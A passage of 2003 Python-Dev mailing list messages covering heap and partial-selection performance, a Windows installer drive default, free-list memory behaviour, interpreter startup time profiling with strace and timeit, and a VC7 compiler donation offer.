            buf, eq, gt = split(buf, pivot)
            sofar.extend(gt)
            if len(sofar) < k:
                sofar.extend(eq[:k - len(sofar)])

        self.buf = sofar
        self.cutoff = pivot

    def get(self):
        from random import choice
        buf = self.buf
        k = self.k
        if len(buf) <= k:
            return buf

        # Retain only the k largest.
        sofar = []
        needed = k
        while needed:
            pivot = choice(buf)
            lt, eq, gt = split(buf, pivot)
            if len(gt) <= needed:
                sofar.extend(gt)
                needed -= len(gt)
                if needed:
                    takefromeq = min(len(eq), needed)
                    sofar.extend(eq[:takefromeq])
                    needed -= takefromeq
                # If we still need more, they have to
                # come out of things < pivot.
                buf = lt
            else:
                # gt alone is too large.
                buf = gt

        assert len(sofar) == k
        self.buf = sofar
        return sofar
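
A hypothetical driver for the class above, roughly matching the
largest-1000-of-a-million-floats test; -1.0 works as minusinf because
random() only returns values in [0.0, 1.0):

from random import random

k = 1000
kb = KBest(k, -1.0)
for i in xrange(1000000):
    kb.put(random())
best = kb.get()     # the k largest, in no particular order
best.sort()
print len(best), best[0], best[-1]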



From BPettersen@NAREX.com  Tue May  6 05:40:04 2003
From: BPettersen@NAREX.com (Bjorn Pettersen)
Date: Mon, 5 May 2003 22:40:04 -0600
Subject: [Python-Dev] Windows installer request...
Message-ID: <60FB8BB7F0EFC7409B75EEEC13E20192022DE23A@admin56.narex.com>

> From: Tim Peters [mailto:tim.one@comcast.net]
>
> [Bjorn Pettersen]
> > Would it be possible for the windows installer to use
> > $SYSTEMDRIVE$ as the default installation drive instead
> > of C:?
[...]

> Are you saying that the "Select Destination Directory" dialog
> box doesn't allow you to select your E: drive?  Or just
> that you'd rather not need to select the drive you want?

Most installers default to the system drive, so I didn't even look the
first time. I am able to change it manually.

> > If it's considered a good idea, and someone can point me to
> > where the change has to be made, I'd be more than willing to
> > produce a patch...
>
> I apparently left this comment in the Wise script:
>
>     Note from Tim:  doesn't seem to be a way to get the true
>     boot drive, the Wizard hardcodes "C".
>
> So, AFAIK, there isn't a straightforward way to get Wise 8.14
> to suggest a drive other than C:.

It should be as easy as this (platforms that don't have %systemdrive% could
only install to C:):

 item: Get Environment Variable
   Variable=OSDRIVE
   Environment=SystemDrive
   Default=C:
 end

However, you might have to do

 item: Get Registry Key Value
   Variable=OSDRIVE
   Key=System\CurrentControlSet\Control\Session Manager\Environment
   Value Name=SystemDrive
   Flags=00000100
   Default=C:
 end

(I'm not sure about the Flags parameter.)  I couldn't find much documentation,
and the example I'm looking at is a little "divided" about which one it
should use... I think it tries the first one, and falls back on the
second(?) (http://ibinstall.defined.net/dl_scripts.htm,
script_6016.zip/IBWin32Setup.wse).

Also, it looks like you want to use %SYS32% to get to the windows system
directory (on WinXP, it's c:\windows\system32, which doesn't seem to be
listed anywhere...)

I can't figure out how you're building the installer however. If you can
point me in the right direction I can test it on my special WinXP,
regular WinXP, Win98, Win2k, and maybe WinNT4 (I think we still have one
around :-).

-- bjorn



From eppstein@ics.uci.edu  Tue May  6 07:00:24 2003
From: eppstein@ics.uci.edu (David Eppstein)
Date: Mon, 05 May 2003 23:00:24 -0700
Subject: [Python-Dev] Re: heaps
References: <20414172.1052079989@[10.0.1.2]> <LNBBLJKPBEHFEDALKOLCIEAFEFAB.tim.one@comcast.net>
Message-ID: <eppstein-4216E0.23002405052003@main.gmane.org>

In article <LNBBLJKPBEHFEDALKOLCIEAFEFAB.tim.one@comcast.net>,
 Tim Peters <tim.one@comcast.net> wrote:

> > For fairness, it might be interesting to try another run of your test
> > in which the input sequence is sorted in increasing order rather
> > than random.
> 
> Comparing the worst case of one against the best case of the other isn't my
> idea of fairness <wink>, but sure.

Well, it doesn't seem any fairer to use random data to compare an 
algorithm with an average time bound that depends on an assumption of 
randomness in the data...anyway, the point was more to understand the 
limiting cases.  If one algorithm is usually 3x faster than the other, 
and is never more than 10x slower, that's better than being usually 3x 
faster but sometimes 1000x slower, for instance.

> > I'd have to know more about your application to
> > have an idea whether the sorted or randomly-permuted case is more
> > representative.
> 
> Of course --  so would I <wink>.

My Java KBest code was written to make data subsets for a half-dozen web 
pages (same data selected according to different criteria).  Of these 
six instances, one is presented the data in roughly ascending order, one 
in descending order, and the other four are less clear but probably not 
random.

Robustness in the face of this sort of variation is why I prefer any 
average-case assumptions in my code's performance to depend only on 
randomness from a random number generator, and not arbitrariness in the 
actual input.  But I'm not sure I'd usually be willing to pay a 3x 
penalty for that robustness.

> Here's a surprise:  I coded a variant of the quicksort-like partitioning
> method, at the bottom of this mail.  On the largest-1000 of a million
> random-float case, times were remarkably steady across trials (i.e., using a
> different set of a million random floats each time):
> 
> heapq                    0.96 seconds
> sort (micro-optimized)   3.4  seconds
> KBest (below)            2.6  seconds

Huh.  You're almost convincing me that asymptotic analysis works even in 
the presence of Python's compiled-vs-interpreted anomalies.  The other 
surprise is that (unlike, say, the sort or heapq versions) your KBest 
doesn't look significantly more concise than my earlier Java 
implementation.

-- 
David Eppstein                      http://www.ics.uci.edu/~eppstein/
Univ. of California, Irvine, School of Information & Computer Science



From harri.pasanen@trema.com  Tue May  6 09:55:27 2003
From: harri.pasanen@trema.com (Harri Pasanen)
Date: Tue, 6 May 2003 10:55:27 +0200
Subject: Where'd my memory go? (was Re: [Python-Dev] Dictionary sparseness)
In-Reply-To: <16054.48379.533379.672799@montanaro.dyndns.org>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer> <200305051957.25403.aleax@aleax.it> <16054.48379.533379.672799@montanaro.dyndns.org>
Message-ID: <200305061055.27898.harri.pasanen@trema.com>

Speaking of memory consumption, has the memory footprint of Python 
changed significantly from 2.2 to 2.3?

I've been toying with the idea of making a small Python ever since I
compiled Python 1.0 for an MS-DOS box with 512KB of memory.  I've
looked at the Palm Python stuff, but I did not get a clear picture of
whether they really did everything possible to make it small, including
changing the representation of internal structs, or whether they just
chopped away the complex type, parser, compiler, etc.

Regards,

Harri





From mal@lemburg.com  Tue May  6 11:03:15 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Tue, 06 May 2003 12:03:15 +0200
Subject: Where'd my memory go? (was Re: [Python-Dev] Dictionary	sparseness)
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHAEDNFJAA.tim.one@comcast.net>
References: <BIEJKCLHCIOIHAGOKOLHAEDNFJAA.tim.one@comcast.net>
Message-ID: <3EB78863.5070105@lemburg.com>

Tim Peters wrote:
> [Skip Montanaro]
> 
> [on assorted freelists]
> 
>>These shortcomings could be remedied by suitable inspection
>>functions added to sys for debug builds.
> 
> If someone cares enough <wink>, sure.
> 
>>This leads me to wonder, has anyone measured the cost of deleting the
>>int and float free lists when pymalloc is enabled?  I wonder how
>>unbearable it would be.
> 
> Vladimir did when he was first developing pymalloc, and left the free lists
> in deliberately.  I haven't tried it.  pymalloc is a bit faster since then,
> but will always have the additional overhead of needing to figure out
> *which* freelist to look in (pymalloc's free lists are segregated by block
> size), and, because it recycles empty pools among different block sizes too,
> the overhead on free of checking for pool emptiness.  The int free list is
> faster in part because it's so damn Narcissistic <0.7 wink>.

If someone really cares, I suppose that the garbage collector could
do an occasional scan of the int free list and chop off the tail
after a certain number of entries.

FWIW, Unicode free lists have a cap to limit the number of entries
in the list to 1024.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, May 06 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
EuroPython 2003, Charleroi, Belgium:                        49 days left



From guido@python.org  Tue May  6 13:07:54 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 06 May 2003 08:07:54 -0400
Subject: [Python-Dev] Startup time
Message-ID: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net>

While Python's general speed has gone up, its startup speed has slowed
down!

I timed this two different ways.  The first way is to run

  python<version> -c "import time; print time.clock()"

On Unix, this prints the CPU time used since the process was created.
The second way is to run

  time python<version> -c pass

which shows CPU and real time to complete running the process.  I did
this on a 633 MHz PC running Red Hat Linux 7.3.  The Python builds
were standard non-debug builds.  I tried with and without the -S
option, which is supposed to suppress loading of site.py and hence
most startup overhead; it didn't exist in Python 1.3 and 1.4.

Results for the first way are pretty inaccurate because it's such a
small number and is only measured in 1/100 of a second, yet revealing.
Some times are printed as two values; I didn't do enough runs to
compute a careful average, so I'm just showing the range:

  Version	CPU Time	CPU Time with -S
  1.3		0.00		N/A
  1.4		0.00		N/A
  1.5.2		0.01		0.00
  2.0		0.01-0.02	0.00
  2.1		0.01-0.02	0.00
  2.2		0.02		0.00
  2.3		0.04		0.03-0.04

Now using time:

  Version	CPU Time	CPU Time with -S
  1.3		0.004		N/A
  1.4		0.004		N/A
  1.5		0.018		0.006
  2.0		0.021		0.006
  2.1		0.018		0.004
  2.2		0.025		0.004
  2.3		0.045		0.045

Note two things: (a) the start time goes up over time, and (b) for
Python 2.3, -S doesn't make any difference.

Given that we often run very short Python programs, and given e.g. Python's
popularity for CGI scripts, I find this increase in startup time very
worrisome, and worthy of our attention (more than gaining nanoseconds
on dict operations or even socket I/O speed).

My goal: I'd like Python 2.3(final) to start up at least as fast as
Python 2.2, and I'd like the much faster startup time back with -S.

I have no time to investigate the cause right now, although I have a
suspicion that the problem might be in loading too much of the
encoding framework at start time (I recall Marc-Andre and Martin
debating this earlier).

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mcherm@mcherm.com  Tue May  6 13:32:03 2003
From: mcherm@mcherm.com (Michael Chermside)
Date: Tue,  6 May 2003 05:32:03 -0700
Subject: [Python-Dev] Re: heaps
Message-ID: <1052224323.3eb7ab43530a5@mcherm.com>

Zooko writes:
> Shouldn't heapq be a subclass of list?
  [...]
> One thing I don't know how to implement is:
> 
> # This changes mylist itself into a heapq -- it doesn't make a copy of mylist!
> makeheapq(mylist)
> 
> Perhaps this is a limitation of the current object model?  Or is there a way
> to change an object's type at runtime.

To change an object's CLASS, sure, but its TYPE -- that seems impossible to me on
the face of it, since a different type may have a different C layout. Now in
THIS case there's no need for a different C layout, so perhaps there's some
weird trick I don't know, but I wouldn't think so.
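
For what it's worth, __class__ assignment does work between ordinary
new-style classes with compatible layouts, but CPython refuses it when a
builtin such as a plain list is involved -- which is exactly the
makeheapq(mylist) case.  A quick illustration (class names made up):

class A(object):
    pass

class B(object):
    pass

a = A()
a.__class__ = B          # allowed: both are ordinary classes, same layout
assert isinstance(a, B)

class MyList(list):
    pass

mylist = [3, 1, 2]
try:
    mylist.__class__ = MyList   # retyping a builtin list in place
except TypeError, e:
    print e                     # refused with a TypeError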

As to your FIRST point though... the choice seems to be between making heapq
a subclass of list or a module for operating on a list. You argue that the
syntax will be cleaner, but comparing your examples:

> heap = []
> heappush(heap, item)
> item = heappop(heap)
> item = heap[0]

> heap = heapq()
> heap.push(item)
> item = heap.pop()
> item = heap[0]

I honestly see little meaningful difference. Since (as per earlier discussion)
heapq is NOT intended to be an abstract heap data type, I tend to prefer the
simpler solution (using a list instead of subclassing).

-- Michael Chermside



From tim.one@comcast.net  Tue May  6 16:47:46 2003
From: tim.one@comcast.net (Tim Peters)
Date: Tue, 06 May 2003 11:47:46 -0400
Subject: Where'd my memory go? (was Re: [Python-Dev] Dictionary	sparseness)
In-Reply-To: <3EB78863.5070105@lemburg.com>
Message-ID: <BIEJKCLHCIOIHAGOKOLHIEGOFJAA.tim.one@comcast.net>

[M.-A. Lemburg]
> If someone really care, I suppose that the garbage collector could
> do an occasional scan of the int free list and chop of the tail
> after a certain number of entries.

Int objects aren't allocated individually; malloc() is used to get single
"int blocks", which contain room for about 1000 ints at a time, and these
blocks are carved up internally by intobject.c.  So it isn't possible to
reclaim the space for a single int, so "tail" doesn't mean anything useful
in this context.

> FWIW, Unicode free lists have a cap to limit the number of entries
> in the list to 1024.

The Unicode freelist is more like the frameobject freelist that way (it is
possible to reclaim the space for an individual Unicode string or frame
object).



From skip@pobox.com  Tue May  6 16:55:25 2003
From: skip@pobox.com (Skip Montanaro)
Date: Tue, 6 May 2003 10:55:25 -0500
Subject: [Python-Dev] testing with and without pyc files present
Message-ID: <16055.56045.277686.400944@montanaro.dyndns.org>

The test targets in the Makefile first delete any .py[co] files, then run
the test suite twice.  I know there must be a reason for this, but isn't
there a less sledgehammer-like and more explicit way to test whatever this
is trying to test?

Skip


From guido@python.org  Tue May  6 17:04:20 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 06 May 2003 12:04:20 -0400
Subject: [Python-Dev] testing with and without pyc files present
In-Reply-To: Your message of "Tue, 06 May 2003 10:55:25 CDT."
 <16055.56045.277686.400944@montanaro.dyndns.org>
References: <16055.56045.277686.400944@montanaro.dyndns.org>
Message-ID: <200305061604.h46G4KR25972@odiug.zope.com>

> The test targets in the Makefile first delete any .py[co] files, then run
> the test suite twice.  I know there must be a reason for this, but isn't
> there a less sledgehammer-like and more explicit way to test whatever this
> is trying to test?

In the past, we've had problems where bugs in the marshalling or
elsewhere caused bytecode read from .pyc files to behave differently
than bytecode generated directly from a .py source file.  Sometimes
the bytecode read from a .pyc file had the bug, sometimes the directly
generated bytecode.  This is sometimes a very shy bug needing a lot of
sample data.  How else would you propose to test this?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal@lemburg.com  Tue May  6 17:12:32 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Tue, 06 May 2003 18:12:32 +0200
Subject: Where'd my memory go? (was Re: [Python-Dev] Dictionary	sparseness)
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHIEGOFJAA.tim.one@comcast.net>
References: <BIEJKCLHCIOIHAGOKOLHIEGOFJAA.tim.one@comcast.net>
Message-ID: <3EB7DEF0.4020105@lemburg.com>

Tim Peters wrote:
> [M.-A. Lemburg]
> 
>>If someone really care, I suppose that the garbage collector could
>>do an occasional scan of the int free list and chop of the tail
>>after a certain number of entries.
> 
> Int objects aren't allocated individually; malloc() is used to get single
> "int blocks", which contain room for about 1000 ints at a time, and these
> blocks are carved up internally by intobject.c.  So it isn't possible to
> reclaim the space for a single int, so "tail" doesn't mean anything useful
> in this context.

Hmm, looking at the code it seems that the different blocks
do not reference each other. Wouldn't it be possible to link
them together as a list of blocks?  This list could then be used
for the review operation.

>>FWIW, Unicode free lists have a cap to limit the number of entries
>>in the list to 1024.
> 
> The Unicode freelist is more like the frameobject freelist that way (it is
> possible to reclaim the space for an individual Unicode string or frame
> object).

Probably :-)

Would using the block technique from the int implementation
make a difference for the frame objects?  I would guess that a
typical Python program rarely has more than 100 frames alive
at any one time. These could be placed into such a block to
make setting them up faster, possibly making Python function
calls a tad snappier.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, May 06 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
EuroPython 2003, Charleroi, Belgium:                        49 days left



From skip@pobox.com  Tue May  6 17:16:45 2003
From: skip@pobox.com (Skip Montanaro)
Date: Tue, 6 May 2003 11:16:45 -0500
Subject: [Python-Dev] testing with and without pyc files present
In-Reply-To: <200305061604.h46G4KR25972@odiug.zope.com>
References: <16055.56045.277686.400944@montanaro.dyndns.org>
 <200305061604.h46G4KR25972@odiug.zope.com>
Message-ID: <16055.57325.88910.417060@montanaro.dyndns.org>

    Guido> Sometimes the bytecode read from a .pyc file had the bug,
    Guido> somtimes the directly generated bytecode.  This is sometimes a
    Guido> very shy bug needing a lot of sample data.  How else would you
    Guido> propose to test this?

I have no idea, but the reason for the two test runs should probably be
documented somewhere.  I just embellished the comment in Makefile.pre.in
which precedes the test targets.

Skip


From skip@pobox.com  Tue May  6 17:20:34 2003
From: skip@pobox.com (Skip Montanaro)
Date: Tue, 6 May 2003 11:20:34 -0500
Subject: [Python-Dev] pyconfig.h not regenerated by "config.status --recheck"
Message-ID: <16055.57554.364845.689049@montanaro.dyndns.org>

I decided to investigate why the resource module wasn't getting built on my
Mac today.  A quick check showed that build.opt/pyconfig.h didn't include
this stanza:

    /* Define if you have the 'getpagesize' function. */
    #define HAVE_GETPAGESIZE 1

although pyconfig.h.in contained this stanza:

    /* Define if you have the 'getpagesize' function. */
    #undef HAVE_GETPAGESIZE

The date on pyconfig.h.in was May 5.  The date on build.opt/pyconfig.h was
Feb 27.  Executing

    ./config.status --recheck

in my build.opt tree doesn't regenerate pyconfig.h.  I then tried executing

    ../configure --prefix=/Users/skip/local

This generated pyconfig.h.  It would thus appear that config.status
shouldn't be used by developers.  Apparently one of the other flags it
appends to the generated configure command suppresses generation of
pyconfig.h (and maybe other files).

Skip



From jepler@unpythonic.net  Tue May  6 17:21:27 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Tue, 6 May 2003 11:21:27 -0500
Subject: [Python-Dev] Startup time
In-Reply-To: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net>
References: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <20030506162127.GC12791@unpythonic.net>

Comparing 2.2 and 2.3, there are a lot of files opened in 2.3 that
aren't in 2.2.

The comparison is not fully valid because I'm running 2.3 from the
compilation directory, while 2.2 is being run from /usr/bin.

Results:
# Number of attempts to open a file
# Python-2.3b1 compiled with no special flags
$ strace -e open ./python -S -c pass 2>&1 | wc -l
    249
# RedHat 9's /usr/bin/python (based on 2.2.2)
$ strace -e open python -S -c pass 2>&1 | wc -l
    9

# Number of attempts to open an existing file
$ strace -e open python -S -c pass 2>&1 | grep -v ENOENT | wc -l
      8
$ strace -e open ./python -S -c pass 2>&1 | grep -v ENOENT | wc -l
     46

The modules imported in 2.3 are:
    warnings
    re
    sre
    sre_compile
    sre_constants
    sre_parse
    string
    copy_reg
    types
    linecache
    os
    posixpath
    stat
    UserDict
    codecs
    encodings.__init__
    encodings.utf_8

I'm crossing my fingers that the time to reload(m) is similar to the
time to import it in the first place, which gives these maybe-helpful
stats:
$ for i in warnings re sre sre_compile sre_constants sre_parse string copy_reg types linecache os posixpath stat UserDict  codecs encodings.__init__ encodings.utf_8; do echo -n "reload of module $i: "; ./python Lib/timeit.py -s "import $i" "reload($i)"; done
reload of module warnings: 1000 loops, best of 3: 495 usec per loop
reload of module re: 10000 loops, best of 3: 80.3 usec per loop
reload of module sre: 1000 loops, best of 3: 575 usec per loop
reload of module sre_compile: 1000 loops, best of 3: 503 usec per loop
reload of module sre_constants: 1000 loops, best of 3: 380 usec per loop
reload of module sre_parse: 1000 loops, best of 3: 701 usec per loop
reload of module string: 1000 loops, best of 3: 465 usec per loop
reload of module copy_reg: 10000 loops, best of 3: 200 usec per loop
reload of module types: 10000 loops, best of 3: 180 usec per loop
reload of module linecache: 10000 loops, best of 3: 156 usec per loop
reload of module os: 1000 loops, best of 3: 1.53e+03 usec per loop
reload of module posixpath: 1000 loops, best of 3: 403 usec per loop
reload of module stat: 10000 loops, best of 3: 157 usec per loop
reload of module UserDict: 1000 loops, best of 3: 454 usec per loop
reload of module codecs: 1000 loops, best of 3: 852 usec per loop
reload of module encodings.__init__: 1000 loops, best of 3: 244 usec per loop
reload of module encodings.utf_8: 10000 loops, best of 3: 132 usec per loop

These times seem pretty low, but maybe they're accurate.  "os" is the
worst of the lot (1530us) and the total comes to 7507us (7.5ms).  On my
system [2.4GHz Pentium4], this is a typical output of 'time' on python:
$ time ./python -S -c pass

real    0m0.249s
user    0m0.020s
sys     0m0.000s
$ time python -S -c pass

real    0m0.043s
user    0m0.010s
sys     0m0.000s

so the time to import these 17 modules does account for 3/4 of the
additional user time between 2.2.2 and 2.3. (Do you care about the 200ms
increase in "real" time, or just the user time?)

I tried compiling 2.3 with profiling, but gprof sees no samples ("Each
sample counts as 0.01 seconds.  no time accumulated").  I don't have
the capability to try oprofile right now either.

Jeff


From tim.one@comcast.net  Tue May  6 17:30:14 2003
From: tim.one@comcast.net (Tim Peters)
Date: Tue, 06 May 2003 12:30:14 -0400
Subject: Where'd my memory go? (was Re: [Python-Dev] Dictionary	sparseness)
In-Reply-To: <3EB7DEF0.4020105@lemburg.com>
Message-ID: <BIEJKCLHCIOIHAGOKOLHEEHDFJAA.tim.one@comcast.net>

[M.-A. Lemburg]
> Hmm, looking at the code it seems that the different blocks
> are not referencing each other. Wouldn't it be possible to link
> them together as list of blocks ? This list could then be used
> for the review operation.

The blocks are linked together; that's what the _intblock.next pointer does.
See PyInt_Fini().

> Would using the block technique from the int implementation
> make a difference for the frame objects ? I would guess that a
> typical Python program rarely has more than 100 frames alive
> at any one time. These could be placed into such a block to
> make setting them up faster, possible making Python function
> calls a tad snippier.

frame objects have variable size; int objects have fixed size; variable size
objects don't play nice with fixed block sizes.  Note that the frame
allocation code already tries to reuse whatever initialization is left
over from the frame object it (normally) pulls off the frame free list.



From info@nyc-search.com  Tue May  6 17:57:56 2003
From: info@nyc-search.com (NYC-SEARCH)
Date: Tue, 6 May 2003 12:57:56 -0400
Subject: [Python-Dev] Python Technical Lead, New York, NY - 80-85k
Message-ID: <01fd01c313f0$a41abb80$e0bfef18@earthlink.net>

Python Technical Lead, New York, NY - 80-85k - IMMEDIATE HIRE
http://www.nyc-search.com/jobs/python.html



From martin@v.loewis.de  Tue May  6 18:35:40 2003
From: martin@v.loewis.de (Martin v. Löwis)
Date: 06 May 2003 19:35:40 +0200
Subject: [Python-Dev] Startup time
In-Reply-To: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net>
References: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <m38ytk7zbn.fsf@mira.informatik.hu-berlin.de>

Guido van Rossum <guido@python.org> writes:

> While Python's general speed has gone up, its startup speed has slowed
> down!

Hear hear! I always thought you didn't care about startup time at all
:-)

> I have no time to investigate the cause right now, although I have a
> suspicion that the problem might be in loading too much of the
> encoding framework at start time (I recall Marc-Andre and Martin
> debating this earlier).

That would be easy to determine: Just disable the block

#if defined(Py_USING_UNICODE) && defined(HAVE_LANGINFO_H) && defined(CODESET)

in pythonrun.c, and see whether it changes anything. To my knowledge,
this is the only cause of loading encodings during startup on Unix.

Regards,
Martin



From martin@v.loewis.de  Tue May  6 18:37:46 2003
From: martin@v.loewis.de (Martin v. Löwis)
Date: 06 May 2003 19:37:46 +0200
Subject: [Python-Dev] Startup time
In-Reply-To: <20030506162127.GC12791@unpythonic.net>
References: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net>
 <20030506162127.GC12791@unpythonic.net>
Message-ID: <m34r487z85.fsf@mira.informatik.hu-berlin.de>

Jeff Epler <jepler@unpythonic.net> writes:

> Comparing 2.2 and 2.3, there are a lot of files opened in 2.3 that
> aren't in 2.2.

Very interesting. Could you also try to find out the difference in
terms of stat calls?

> I'm crossing my fingers that the time to reload(m) is similar to the
> time to import it in the first place, which gives these maybe-helpful
> stats:

That is, unfortunately, not the case: reloading a dynamic module is a
no-op.

Regards,
Martin


From martin@v.loewis.de  Tue May  6 18:39:21 2003
From: martin@v.loewis.de (Martin v. Löwis)
Date: 06 May 2003 19:39:21 +0200
Subject: [Python-Dev] pyconfig.h not regenerated by "config.status --recheck"
In-Reply-To: <16055.57554.364845.689049@montanaro.dyndns.org>
References: <16055.57554.364845.689049@montanaro.dyndns.org>
Message-ID: <m3znm06kl2.fsf@mira.informatik.hu-berlin.de>

Skip Montanaro <skip@pobox.com> writes:

> This generated pyconfig.h.  It would thus appear that config.status
> shouldn't be used by developers.  Apparently one of the other flags it
> appends to the generated configure command suppresses generation of
> pyconfig.h (and maybe other files).

Can you find out whether this is related to the fact that you are
building in a separate build directory?

Regards,
Martin



From aleax@aleax.it  Tue May  6 18:49:52 2003
From: aleax@aleax.it (Alex Martelli)
Date: Tue, 6 May 2003 19:49:52 +0200
Subject: [Python-Dev] Startup time
In-Reply-To: <20030506162127.GC12791@unpythonic.net>
References: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net> <20030506162127.GC12791@unpythonic.net>
Message-ID: <200305061949.52953.aleax@aleax.it>

On Tuesday 06 May 2003 06:21 pm, Jeff Epler wrote:
   ...
> # Number of attempts to open an existing file
> $ strace -e open python -S -c pass 2>&1 | grep -v ENOENT | wc -l
>       8
> $ strace -e open ./python -S -c pass 2>&1 | grep -v ENOENT | wc -l
>      46

Yes, same here (2.2.2 and 2.3 from CVS both built locally with Mdk 9.0).

Besides the .py and .pyc for all the modules, there's a few more files
that 2.3 is opening and 2.2 isn't:

early on:
open("/usr/lib/libstdc++.so.5", O_RDONLY) = 3
open("/lib/libgcc_s.so.1", O_RDONLY)    = 3

in the midst of the imports (just before encodings/__init__.py):
open("/usr/share/locale/locale.alias", O_RDONLY) = 3
open("/usr/share/locale/en_US/LC_CTYPE", O_RDONLY) = 3


Alex



From aleax@aleax.it  Tue May  6 19:20:42 2003
From: aleax@aleax.it (Alex Martelli)
Date: Tue, 6 May 2003 20:20:42 +0200
Subject: [Python-Dev] Startup time
In-Reply-To: <m34r487z85.fsf@mira.informatik.hu-berlin.de>
References: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net> <20030506162127.GC12791@unpythonic.net> <m34r487z85.fsf@mira.informatik.hu-berlin.de>
Message-ID: <200305062020.42734.aleax@aleax.it>

On Tuesday 06 May 2003 07:37 pm, Martin v. Löwis wrote:
> Jeff Epler <jepler@unpythonic.net> writes:
> > Comparing 2.2 and 2.3, there are a lot of files opened in 2.3 that
> > aren't in 2.2.
>
> Very interesting. Could you also try to find out the difference in
> terms of stat calls?

In general:

[alex@lancelot blm]$ strace -e stat64 python2.2 -S -c pass 2>&1 | wc -l
     18
[alex@lancelot blm]$ strace -e stat64 python2.3 -S -c pass 2>&1 | wc -l
     71
[alex@lancelot blm]$ strace -e fstat64 python2.2 -S -c pass 2>&1 | wc -l
      8
[alex@lancelot blm]$ strace -e fstat64 python2.3 -S -c pass 2>&1 | wc -l
     71
[alex@lancelot blm]$

Of the stat64 calls, the found-files only:

[alex@lancelot blm]$ strace -e stat64 python2.2 -S -c pass 2>&1 | grep -v 
ENOENT | wc -l
      4
[alex@lancelot blm]$ strace -e stat64 python2.3 -S -c pass 2>&1 | grep -v 
ENOENT | wc -l
     12


Alex



From guido@python.org  Tue May  6 19:26:07 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 06 May 2003 14:26:07 -0400
Subject: [Python-Dev] MS VC 7 offer
Message-ID: <200305061826.h46IQ7605750@odiug.zope.com>

A month ago at Python UK in Oxford (which was colocated with C and C++
standardization meetings as well as a general C and C++ users
conference) I met with some folks from Microsoft's VC development
team, including the project lead, Nick Hodapp.  I told Nick that
Python for Windows was still built using VC 6.  He pointed out that
the actual compilers (not the GUI) from VC 7 are freely downloadable.

More recently, Nick sent me an email offering to donate copies of VC 7
to the "key developers".  I count Tim, myself and Mark Hammond among
the key developers.  Is there anyone else who would count themselves
among those?

I presume he's offering the pro version, which has a real optimizer,
unlike the "standard" version that was kindly donated by Bjorn
Pettersen.

I can see advantages and disadvantages of moving to VC 7; I'm sure the
VC 7 compiler is more standard-compliant and generates faster code,
but a disadvantage is that you can't apparently link binaries built
with VC 6 to a program built with VC 7, meaning that 3rd party
extensions will have to be recompiled with VC 7 as well.  I have no
idea how many projects this will affect (don't worry about Zope Corp
:-).  Maybe we should try to include those 3rd party developers in the
deal.  (I think Robin Dunn would be affected, wxPython has a Windows
distribution.)

If you think this is a bad idea or if you would like to qualify for a
compiler donation, please follow up!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From martin@v.loewis.de  Tue May  6 19:27:53 2003
From: martin@v.loewis.de (Martin v. Löwis)
Date: 06 May 2003 20:27:53 +0200
Subject: [Python-Dev] Startup time
In-Reply-To: <200305061949.52953.aleax@aleax.it>
References: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net>
 <20030506162127.GC12791@unpythonic.net>
 <200305061949.52953.aleax@aleax.it>
Message-ID: <m33cjs6ic6.fsf@mira.informatik.hu-berlin.de>

Alex Martelli <aleax@aleax.it> writes:

> in the midst of the imports (just before encodings/__init__.py):
> open("/usr/share/locale/locale.alias", O_RDONLY) = 3
> open("/usr/share/locale/en_US/LC_CTYPE", O_RDONLY) = 3

That is the effect of nl_langinfo(CODESET).

Regards,
Martin


From jepler@unpythonic.net  Tue May  6 19:36:00 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Tue, 6 May 2003 13:36:00 -0500
Subject: [Python-Dev] Startup time
In-Reply-To: <m34r487z85.fsf@mira.informatik.hu-berlin.de>
References: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net> <20030506162127.GC12791@unpythonic.net> <m34r487z85.fsf@mira.informatik.hu-berlin.de>
Message-ID: <20030506183600.GA27125@unpythonic.net>

On Tue, May 06, 2003 at 07:37:46PM +0200, Martin v. Löwis wrote:
> Jeff Epler <jepler@unpythonic.net> writes:
>
> > Comparing 2.2 and 2.3, there are a lot of files opened in 2.3 that
> > aren't in 2.2.
>
> Very interesting. Could you also try to find out the difference in
> terms of stat calls?
# redhat's 9 2.2.2
$ strace -e stat64 python -S -c pass 2>&1 | wc -l
     11
# python.org's 2.3b1
$ strace -e stat64 ./python -S -c pass 2>&1 | wc -l
     72

By the way, I was able to account for the wall-time difference I saw
due to the fact that my PYTHONPATH contains some directories on NFS,
and so the attempted open()s and stat()s of standard modules did take
measurable wall time.

With no PYTHONPATH variable set, these are the startup timings I see:
# 2.2.2
real    0m0.005s
user    0m0.000s
sys     0m0.000s

# 2.3b2
real    0m0.044s
user    0m0.020s
sys     0m0.020s

By the way, I wouldn't be too excited about trusting this Python --
    ./python -c "import random"
    Illegal instruction
I wonder what's gone wrong...
(gdb) run -c "import random"
Starting program: /usr/src/Python-2.3b1/python -c "import random"
